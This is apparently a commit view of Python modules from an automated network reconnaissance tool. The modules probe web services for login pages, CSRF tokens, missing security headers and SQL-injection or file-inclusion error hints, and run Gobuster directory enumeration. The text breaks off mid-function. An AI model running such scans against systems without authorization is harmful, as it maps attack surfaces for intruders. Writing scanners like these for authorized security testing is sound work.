logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
parser.add_argument("-u", "--url", help="Target URL to scan")
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
args = parser.parse_args()
settings = load_settings()
url = args.url or settings.get("url")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyrieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()

View File

def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS only matters over HTTPS; it is flagged unconditionally here because this helper does not know the scheme.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
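The missing-header logic in `_detect_signals` reduces to a membership test over lowercased header names; a sketch that folds the separate HSTS check into the same list (helper name hypothetical):

```python
def missing_security_headers(headers):
    # Same lowercase-key normalization as _lower_headers / _detect_signals above.
    h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
    required = [
        "x-frame-options",
        "x-content-type-options",
        "content-security-policy",
        "referrer-policy",
        "strict-transport-security",
    ]
    # Preserve the declaration order so the report is stable.
    return [name for name in required if name not in h]

missing = missing_security_headers({"Content-Security-Policy": "default-src 'self'"})
```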
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
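The login detection used by `_detect_signals` is deliberately cheap; the core heuristic can be sketched on its own (simplified, helper name hypothetical):

```python
def looks_like_login(body_snippet: str) -> bool:
    # Same checks as _detect_signals: a <form> containing a password input,
    # or obvious login keywords anywhere in the (lowercased) body.
    s = (body_snippet or "").lower()
    has_form = "<form" in s
    has_password = 'type="password"' in s or "type='password'" in s
    return (has_form and has_password) or any(
        x in s for x in ["login", "sign in", "connexion"]
    )

page = '<html><form method="post"><input type="password" name="pw"></form></html>'
```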

View File

@@ -3,11 +3,11 @@
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
-- Writes each finding into the `webenum` table
-- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
-- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
-- No filesystem output: parse Gobuster stdout directly
-- Dynamic filtering of HTTP statuses via shared_data.web_status_codes
+- Writes each finding into the `webenum` table in REAL-TIME (streaming).
+- Updates bjorn_progress with the actual percentage (0-100%).
+- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
+- No filesystem output: parse Gobuster stdout/stderr directly.
+- Dynamic filtering of HTTP statuses via shared_data.web_status_codes.
"""
import re
@@ -15,6 +15,9 @@ import socket
import subprocess
import threading
import logging
+import time
+import os
+import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
@@ -27,8 +30,8 @@ b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
@@ -36,8 +39,6 @@ b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
-# Fallback value if the UI has not yet initialized shared_data.web_status_codes
-# (by default: useful 2xx, 3xx, 401/403/405 and all 5xx; 429 not included)
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
@@ -50,7 +51,6 @@ CTL_RE = re.compile(r"[\x00-\x1F\x7F]")  # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
-# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
@@ -60,13 +60,14 @@ GOBUSTER_LINE = re.compile(
re.VERBOSE
)
+# Regex to capture Gobuster's progress output on stderr
+# e.g. "Progress: 1024 / 4096 (25.00%)"
+GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]:
"""
Turn a "UI" policy into a set of integer HTTP codes.
-policy may contain:
-- int (e.g. 200, 403)
-- "xXX" (e.g. "2xx", "5xx")
-- "a-b" (e.g. "500-504")
"""
codes: Set[int] = set()
if not policy:
@@ -99,30 +100,48 @@ def _normalize_status_policy(policy) -> Set[int]:
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
-In-memory only: no CSV, no temp files.
+Streaming mode: reads stdout/stderr in real-time for DB inserts and progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster"  # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
+# Cache the wordlist size (for the % computation)
+self.wordlist_size = 0
+self._count_wordlist_lines()
# ---- Sanity checks
-import os
+self._available = True
if not os.path.exists(self.gobuster_path):
-raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
+logger.error(f"Gobuster not found at {self.gobuster_path}")
+self._available = False
if not os.path.exists(self.wordlist):
-raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
+logger.error(f"Wordlist not found: {self.wordlist}")
+self._available = False
# Policy coming from the UI: create it if absent
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
-f"WebEnumeration initialized (stdout mode, no files). "
-f"Using status policy: {self.shared_data.web_status_codes}"
+f"WebEnumeration initialized (Streaming Mode). "
+f"Wordlist lines: {self.wordlist_size}. "
+f"Policy: {self.shared_data.web_status_codes}"
)
+def _count_wordlist_lines(self):
+"""Count the wordlist lines once, to compute the %."""
+if self.wordlist and os.path.exists(self.wordlist):
+try:
+# Fast buffered read
+with open(self.wordlist, 'rb') as f:
+self.wordlist_size = sum(1 for _ in f)
+except Exception as e:
+logger.error(f"Error counting wordlist lines: {e}")
+self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
@@ -184,155 +203,195 @@ class WebEnumeration:
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
-# -------------------- Gobuster runner (stdout) --------------------
-def _run_gobuster_stdout(self, url: str) -> Optional[str]:
-base_cmd = [
-self.gobuster_path, "dir",
-"-u", url,
-"-w", self.wordlist,
-"-t", "10",
-"--quiet",
-"--no-color",
-# If your gobuster version supports it, you can cut the noise at the source:
-# "-b", "404,429",
-]
-def run(cmd):
-return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
-# Try with -z first
-cmd = base_cmd + ["-z"]
-logger.info(f"Running Gobuster on {url}...")
-try:
-res = run(cmd)
-if res.returncode == 0:
-logger.success(f"Gobuster OK on {url}")
-return res.stdout or ""
-# Fallback if -z is unknown
-if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
-logger.info("Gobuster doesn't support -z, retrying without it.")
-res2 = run(base_cmd)
-if res2.returncode == 0:
-logger.success(f"Gobuster OK on {url} (no -z)")
-return res2.stdout or ""
-logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
-return None
-logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
-return None
-except Exception as e:
-logger.error(f"Gobuster exception on {url}: {e}")
-return None
-def _parse_gobuster_text(self, text: str) -> List[Dict]:
-"""
-Parse gobuster stdout lines into entries:
-{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
-"""
-entries: List[Dict] = []
-if not text:
-return entries
-for raw in text.splitlines():
-# 1) strip ANSI/control BEFORE regex
-line = ANSI_RE.sub("", raw)
-line = CTL_RE.sub("", line)
-line = line.strip()
-if not line:
-continue
-m = GOBUSTER_LINE.match(line)
-if not m:
-logger.debug(f"Unparsed line: {line}")
-continue
-# 2) extract all fields NOW
-path = m.group("path") or ""
-status = int(m.group("status"))
-size = int(m.group("size") or 0)
-redir = m.group("redir")
-# 3) normalize path
-if not path.startswith("/"):
-path = "/" + path
-path = "/" + path.strip("/")
-entries.append({
-"path": path,
-"status": status,
-"size": size,
-"redirect": redir.strip() if redir else None
-})
-logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
-return entries
-# -------------------- Public API --------------------
+# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
-Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
+Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
+Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
+if not self._available:
+return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
-logger.info("Interrupted before start (orchestrator flag).")
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
-logger.info(f"Enumerating {base_url} ...")
-self.shared_data.bjornorch_status = "WebEnumeration"
-self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
-if self.shared_data.orchestrator_should_exit:
-logger.info("Interrupted before gobuster run.")
-return "interrupted"
-stdout_text = self._run_gobuster_stdout(base_url)
-if stdout_text is None:
-return "failed"
-if self.shared_data.orchestrator_should_exit:
-logger.info("Interrupted after gobuster run (stdout captured).")
-return "interrupted"
-entries = self._parse_gobuster_text(stdout_text)
-if not entries:
-logger.warning(f"No entries for {base_url}.")
-return "success"  # scan ran fine but no findings
-# ---- Dynamic filtering based on shared_data.web_status_codes
-allowed = self._allowed_status_set()
-pre = len(entries)
-entries = [e for e in entries if e["status"] in allowed]
-post = len(entries)
-if post < pre:
-preview = sorted(list(allowed))[:10]
-logger.info(
-f"Filtered out {pre - post} entries not in policy "
-f"{preview}{'...' if len(allowed) > 10 else ''}."
-)
+# Setup Initial UI
+self.shared_data.bjorn_orch_status = "WebEnumeration"
+self.shared_data.bjorn_progress = "0%"
+logger.info(f"Enumerating {base_url} (Stream Mode)...")
+# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
+allowed = self._allowed_status_set()
-for e in entries:
-self._db_add_result(
-mac_address=mac_address,
-ip=ip,
-hostname=hostname,
-port=port,
-directory=e["path"],
-status=e["status"],
-size=e.get("size", 0),
-response_time=0,  # gobuster doesn't expose timing here
-content_type=None,  # unknown here; a later HEAD/GET probe can fill it
-tool="gobuster"
-)
-return "success"
+# Command Construction
+# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
+# But we use --no-color to make parsing easier
+cmd = [
+self.gobuster_path, "dir",
+"-u", base_url,
+"-w", self.wordlist,
+"-t", "10",  # Safe for RPi Zero
+"--no-color",
+"--no-progress=false",  # Force progress bar even if redirected
+]
+process = None
+findings_count = 0
+stop_requested = False
+# For progress calc
+total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
+last_progress_update = 0
+try:
+# Merge stdout and stderr so we can read everything in one loop
+process = subprocess.Popen(
+cmd,
+stdout=subprocess.PIPE,
+stderr=subprocess.STDOUT,
+text=True,
+bufsize=1,
+universal_newlines=True
+)
+# Use select() (on Linux) so we can react quickly to stop requests
+# without blocking forever on readline().
+while True:
+if self.shared_data.orchestrator_should_exit:
+stop_requested = True
+break
+if process.poll() is not None:
+# Process exited; drain remaining buffered output if any
+line = process.stdout.readline() if process.stdout else ""
+if not line:
+break
+else:
+line = ""
+if process.stdout:
+if os.name != "nt":
+r, _, _ = select.select([process.stdout], [], [], 0.2)
+if r:
+line = process.stdout.readline()
+else:
+# Windows: select() doesn't work on pipes; best-effort read.
+line = process.stdout.readline()
+if not line:
+continue
+# 3. Clean Line
+clean_line = ANSI_RE.sub("", line).strip()
+clean_line = CTL_RE.sub("", clean_line).strip()
+if not clean_line:
+continue
+# 4. Check for Progress
+if "Progress:" in clean_line:
+now = time.time()
+# Update UI max every 0.5s to save CPU
+if now - last_progress_update > 0.5:
+m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
+if m_prog:
+curr = int(m_prog.group("current"))
+# Calculate %
+pct = (curr / total_lines) * 100
+pct = min(pct, 100.0)
+self.shared_data.bjorn_progress = f"{int(pct)}%"
+last_progress_update = now
+continue
+# 5. Check for Findings (Standard Gobuster Line)
+m_res = GOBUSTER_LINE.match(clean_line)
+if m_res:
+st = int(m_res.group("status"))
+# Apply Filtering Logic BEFORE DB
+if st in allowed:
+path = m_res.group("path")
+if not path.startswith("/"): path = "/" + path
+size = int(m_res.group("size") or 0)
+redir = m_res.group("redir")
+# Insert into DB Immediately
+self._db_add_result(
+mac_address=mac_address,
+ip=ip,
+hostname=hostname,
+port=port,
+directory=path,
+status=st,
+size=size,
+response_time=0,
+content_type=None,
+tool="gobuster"
+)
+findings_count += 1
+# Live feedback in comments
+self.shared_data.comment_params = {
+"url": base_url,
+"found": str(findings_count),
+"last": path
+}
+continue
+# (Optional) Log errors/unknown lines if needed
+# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
+# End of loop
+if stop_requested:
+logger.info("Interrupted by orchestrator.")
+return "interrupted"
+self.shared_data.bjorn_progress = "100%"
+return "success"
+except Exception as e:
+logger.error(f"Execute error on {base_url}: {e}")
+if process:
+try:
+process.terminate()
+except Exception:
+pass
+return "failed"
+finally:
+if process:
+try:
+if stop_requested and process.poll() is None:
+process.terminate()
+# Always reap the child to avoid zombies.
+try:
+process.wait(timeout=2)
+except Exception:
+try:
+process.kill()
+except Exception:
+pass
+try:
+process.wait(timeout=2)
+except Exception:
+pass
+finally:
+try:
+if process.stdout:
+process.stdout.close()
+except Exception:
+pass
+self.shared_data.bjorn_progress = ""
+self.shared_data.comment_params = {}
except Exception as e:
-logger.error(f"Execute error on {ip}:{port}: {e}")
+logger.error(f"General execution error: {e}")
return "failed"
@@ -341,7 +400,7 @@ if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
-logger.info("Starting web directory enumeration...")
+logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
@@ -351,6 +410,7 @@
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
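The streaming loop in this diff keys everything off two regexes: `GOBUSTER_LINE` for findings and `GOBUSTER_PROGRESS_RE` for the percentage. A quick check against typical Gobuster output lines (the `[Size: …]`/redirect tail of `GOBUSTER_LINE` is not shown in the hunk above, so it is reconstructed here as an assumption):

```python
import re

GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
# The first two parts match the hunk; the Size/redirect tail is assumed.
GOBUSTER_LINE = re.compile(
    r"""^(?P<path>\S+)\s*
    \(Status:\s*(?P<status>\d{3})\)\s*
    \[Size:\s*(?P<size>\d+)\]\s*
    (?:\[-->\s*(?P<redir>[^\]]+)\])?""",
    re.VERBOSE,
)

m = GOBUSTER_LINE.match("/admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]")
prog = GOBUSTER_PROGRESS_RE.search("Progress: 1024 / 4096 (25.00%)")
```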

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
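The cookie-name to framework mapping above can be exercised in isolation; a sketch reusing the same mapping as `_detect_signals` (helper name hypothetical):

```python
def framework_hints_from_cookies(cookie_names):
    # Same mapping as _detect_signals above.
    hints = []
    for cn in cookie_names:
        l = cn.lower()
        if l in {"csrftoken", "sessionid"}:
            hints.append("django")
        elif l in {"laravel_session", "xsrf-token"}:
            hints.append("laravel")
        elif l == "phpsessid":
            hints.append("php")
        elif "wordpress" in l:
            hints.append("wordpress")
    return sorted(set(hints))

hints = framework_hints_from_cookies(["PHPSESSID", "csrftoken", "wordpress_logged_in_abc"])
```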
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
